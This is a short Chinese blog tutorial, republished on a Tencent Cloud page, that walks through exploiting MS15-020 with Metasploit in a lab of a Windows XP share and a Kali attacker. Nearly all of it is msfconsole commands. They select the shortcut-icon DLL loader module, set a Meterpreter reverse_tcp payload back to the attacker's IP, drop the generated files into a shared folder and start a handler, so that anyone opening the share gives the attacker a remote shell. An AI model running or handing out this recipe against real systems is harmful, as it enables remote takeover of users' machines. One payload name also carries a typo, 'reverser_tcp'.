MSF之MS15_020-文件共享漏洞利用
环境: 共享机/受害者:windows xp IP:192.168.222.1 攻击机:kali linux IP:192.168.10.1
msfconsole //在kali终端输入msfconsole进入控制台
search ms15-020 //搜索ms15-020漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //使用该模块
show options //显示所有参数
set payload windows/meterpreter/reverse_tcp //设置payload
这里写图片描述
设置参数:
set unchost 192.168.222.1 //共享的主机地址
set uncshare //共享的文件夹名
set lhost 192.168.10.1 //攻击机IP地址
exploit
这里写图片描述
运行后会生成三个文件,将三个文件放到共享机的share目录下。
继续在msf中使用handler进行监听:
use exploit/multi/handler
set payload windows/meterpreter/reverser_tcp
set lhost 192.168.10.1
exploit
这里写图片描述
以上设置完成之后在当别的用户再访问这个共享文件夹时就可以直接获得meterpreter
这里写图片描述
这里写图片描述
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-05-06,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
